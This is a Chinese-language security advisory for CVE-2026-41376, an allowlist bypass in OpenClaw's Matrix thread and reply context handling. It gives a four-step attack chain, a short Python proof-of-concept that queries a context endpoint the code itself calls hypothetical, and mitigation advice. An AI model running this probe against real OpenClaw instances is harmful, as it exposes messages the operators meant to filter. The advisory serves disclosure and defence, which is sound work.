CVE-2026-41376 CVSS 5.4 中危

CVE-2026-41376 OpenClaw允许列表绕过漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41376

漏洞类型

访问控制绕过

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.31之前的版本中存在允许列表绕过漏洞。该漏洞源于Matrix线程根和回复上下文处理中未能正确验证消息发送者。攻击者可以获取本应被发送者允许列表过滤的线程根和回复上下文消息，从而绕过访问控制限制，导致信息泄露。

技术细节

该漏洞的根源在于OpenClaw在处理Matrix协议的线程根和回复上下文时的逻辑缺陷。当系统配置了发送者允许列表以屏蔽特定用户的消息时，正常的流程应当是在任何上下文检索操作中强制执行这一过滤规则。然而，受影响的版本在获取上下文数据的相关接口中，未对上下文中包含的历史消息发送者身份进行二次验证。这意味着，即使某用户已被列入黑名单或不在白名单中，其发送的作为线程根或回复的消息依然会通过上下文查询接口返回给请求者。攻击者可以利用这一逻辑漏洞，通过接口遍历或直接查询特定事件ID，绕过前端的展示限制，直接获取后端返回的敏感上下文数据，从而导致信息泄露。

攻击链分析

STEP 1

侦察

攻击者识别出运行OpenClaw的目标实例，并确认其版本低于2026.3.31。

STEP 2

识别被屏蔽内容

攻击者确定一些已被发送者允许列表过滤的特定消息或线程ID。

STEP 3

利用漏洞

攻击者向OpenClaw发送请求，专门获取这些被屏蔽消息的线程根或回复上下文。

STEP 4

信息泄露

由于系统未在上下文获取时验证发送者，服务器返回了本应被过滤的消息内容，攻击者成功读取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-41376: OpenClaw Allowlist Bypass
# This script demonstrates fetching context from a blocked user.

import requests
import json

def check_vulnerability(target_url, event_id):
    """
    Attempts to fetch thread context for a specific event ID.
    If the sender is blocked by allowlist but data is returned, it is vulnerable.
    """
    headers = {
        "Content-Type": "application/json"
    }
    
    # Payload to request thread/reply context
    payload = {
        "event_id": event_id,
        "limit": 10
    }

    try:
        # Sending request to the context endpoint (hypothetical endpoint based on description)
        response = requests.post(f"{target_url}/api/v1/contexts", data=json.dumps(payload), headers=headers)
        
        if response.status_code == 200:
            data = response.json()
            print("[+] Context data retrieved successfully.")
            print("[+] Check if messages from blocked users are present in the response:")
            print(json.dumps(data, indent=2))
            return True
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            return False
            
    except Exception as e:
        print(f"[-] An error occurred: {e}")
        return False

if __name__ == "__main__":
    # Replace with actual target and event ID from a blocked user
    TARGET = "http://localhost:8080"
    EVENT_ID = "$example_event_id_from_blocked_user"
    
    print(f"[*] Testing {TARGET} for CVE-2026-41376...")
    check_vulnerability(TARGET, EVENT_ID)

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施

建议立即升级至修复版本。如果无法立即升级，应在网络层面限制对OpenClaw API的访问，仅允许受信任的客户端IP连接，或者暂时禁用线程上下文查看功能，直到完成修复。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表